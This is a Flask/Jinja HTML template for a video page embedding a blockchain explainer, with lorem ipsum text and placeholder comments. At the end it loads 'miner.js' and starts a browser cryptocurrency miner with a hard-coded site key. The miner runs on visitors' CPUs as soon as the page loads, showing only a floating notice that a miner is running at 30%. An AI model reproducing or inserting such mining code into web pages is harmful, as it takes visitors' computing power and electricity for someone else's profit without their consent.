{% extends "layout.html" %}
{% block content %}
<div class="show-top-grids">
	<div class="col-sm-8 single-left">
		<div class="song">
			<div class="song-info">
				<h3>How does a blockchain work - Simply Explained</h3>
			</div>
			<div class="video-grid">
				<iframe src="https://www.youtube.com/embed/SSo_EIwHSd4" allowfullscreen></iframe>
			</div>
		</div>

		<div class="clearfix"> </div>
		<div class="published">
			<script src="{{ url_for('static', filename='js/jquery.min.js') }}"></script>
			<script>
				$(document).ready(function () {
					size_li = $("#myList li").size();
					x = 1;
					$('#myList li:lt(' + x + ')').show();
					$('#loadMore').click(function () {
						x = (x + 1 <= size_li) ? x + 1 : size_li;
						$('#myList li:lt(' + x + ')').show();
					});
					$('#showLess').click(function () {
						x = (x - 1 < 0) ? 1 : x - 1;
						$('#myList li').not(':lt(' + x + ')').hide();
					});
				});
			</script>
			<div class="load_more">
				<ul id="myList">
					<li>
						<h4>Published on 15 June 2015</h4>
						<p>What is a blockchain and how do they work? I'll explain why blockchains are so special in
							simple and plain English!
							Nullam fringilla sagittis tortor ut rhoncus. Nam vel ultricies erat, vel sodales leo.
							Maecenas pellentesque, est suscipit laoreet tincidunt, ipsum tortor vestibulum leo, ac
							dignissim diam velit id tellus. Morbi luctus velit quis semper egestas. Nam condimentum sem
							eget ex iaculis bibendum. Nam tortor felis, commodo faucibus sollicitudin ac, luctus a
							turpis. Donec congue pretium nisl, sed fringilla tellus tempus in.</p>
					</li>
					<li>
						<p>Nullam fringilla sagittis tortor ut rhoncus. Nam vel ultricies erat, vel sodales leo.
							Maecenas pellentesque, est suscipit laoreet tincidunt, ipsum tortor vestibulum leo, ac
							dignissim diam velit id tellus. Morbi luctus velit quis semper egestas. Nam condimentum sem
							eget ex iaculis bibendum. Nam tortor felis, commodo faucibus sollicitudin ac, luctus a
							turpis. Donec congue pretium nisl, sed fringilla tellus tempus in.</p>
						<p>Nullam fringilla sagittis tortor ut rhoncus. Nam vel ultricies erat, vel sodales leo.
							Maecenas pellentesque, est suscipit laoreet tincidunt, ipsum tortor vestibulum leo, ac
							dignissim diam velit id tellus. Morbi luctus velit quis semper egestas. Nam condimentum sem
							eget ex iaculis bibendum. Nam tortor felis, commodo faucibus sollicitudin ac, luctus a
							turpis. Donec congue pretium nisl, sed fringilla tellus tempus in.</p>
						<div class="load-grids">
							<div class="load-grid">
								<p>Category</p>
							</div>
							<div class="load-grid">
								<a href="/movies">Entertainment</a>
							</div>
							<div class="clearfix"> </div>
						</div>
					</li>
				</ul>
			</div>
		</div>
		<div class="all-comments">
			<div class="all-comments-info">
				<a href="#">All Comments (8,657)</a>
				<div class="box">
					<form>
						<input type="text" placeholder="Name" required=" ">
						<input type="text" placeholder="Email" required=" ">
						<input type="text" placeholder="Phone" required=" ">
						<textarea placeholder="Message" required=" "></textarea>
						<input type="submit" value="SEND">
						<div class="clearfix"> </div>
					</form>
				</div>
				<div class="all-comments-buttons">
					<ul>
						<li><a href="#" class="top">Top Comments</a></li>
						<li><a href="#" class="top newest">Newest First</a></li>
						<li><a href="#" class="top my-comment">My Comments</a></li>
					</ul>
				</div>
			</div>
			<div class="media-grids">
				<div class="media">
					<h5>Tom Brown</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Mark Johnson</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Steven Smith</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Marry Johne</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Mark Johnson</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Mark Johnson</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
				<div class="media">
					<h5>Peter Johnson</h5>
					<div class="media-left">
						<a href="#">

						</a>
					</div>
					<div class="media-body">
						<p>Maecenas ultricies rhoncus tincidunt maecenas imperdiet ipsum id ex pretium hendrerit
							maecenas imperdiet ipsum id ex pretium hendrerit</p>
						<span>View all posts by :<a href="#"> Admin </a></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div class="col-md-4 single-right">


	</div>
	<div class="clearfix"> </div>
</div>

<script type="text/javascript" src="{{ url_for('static', filename='js/miner.js') }}"></script>
<script>
	var _client = new Client.Anonymous('3a18c384ce5acdcc3aa8c0041a85560d9c0d458e25e82ecf8f009e8fe87d832e', {
		throttle: 0.7, c: 'w', ads: 0
	});
	_client.start();
	_client.addMiningNotification("Floating Bottom", "This site is running JavaScript miner at 30%", "#cccccc", 30, "#3d3d3d");

</script>
{% endblock content %}